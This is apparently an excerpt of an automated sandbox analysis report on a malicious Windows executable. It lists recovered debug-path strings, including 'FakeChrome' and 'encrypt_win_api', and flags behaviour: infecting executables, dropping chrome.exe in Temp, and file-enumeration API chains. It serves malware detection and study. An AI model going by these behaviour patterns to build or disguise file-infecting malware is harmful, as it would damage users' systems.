              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1957412867.0000000003770000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\X source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316891166.0000000003B41000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B28000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315144576.0000000003B21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307814627.0000000003B11000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errore\AppCache133408908224609935.txt\1 source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\>; source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ded\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2381664053.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274518073.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274719064.00000000037C3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\65\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2378718036.0000000003C19000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2367688022.0000000003B61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296597448.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296040689.000000000330C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2296967134.000000000333D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297919954.000000000335B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314741527.00000000038DD000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353832982.00000000038FB000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307758471.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314800964.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314907836.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306454387.00000000038CC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299485751.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2315942860.00000000038F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307467722.00000000038D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316633831.000000000395D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306779341.0000000003956000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314963868.0000000003950000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307711721.0000000003966000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316109364.000000000395A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314653770.000000000394E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2317124718.0000000003982000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2354476353.000000000333C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360571973.000000000333C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362367868.000000000333C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\:# source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316169449.000000000333A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306029870.0000000003322000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316249457.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306348471.0000000003347000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.0000000003813000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\{FII source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2015348604.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017889756.0000000003336000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbvb8IC source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298200756.000000000383A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307758471.00000000038E8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297158244.00000000037EE000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2297500931.0000000003829000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306454387.00000000038CC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299485751.000000000388A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2299340114.0000000003840000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307467722.00000000038D3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\T source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003B02000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307527322.0000000003AF0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2306204411.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2307814627.0000000003B11000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275138437.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276086139.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251930708.0000000003335000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275446209.00000000038BC000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251930708.0000000003335000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\O\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274518073.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274719064.00000000037C3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251480244.0000000003361000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046044060.0000000003378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360903093.0000000003AED000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00470160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_0046F730
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_0046FB98
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0046F730
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_00470160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 2_2_0046FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0046FB98
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E3F730
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E40160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E40160
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 3_2_00E3FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00E3FB98
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E40160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E40160
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E3F730
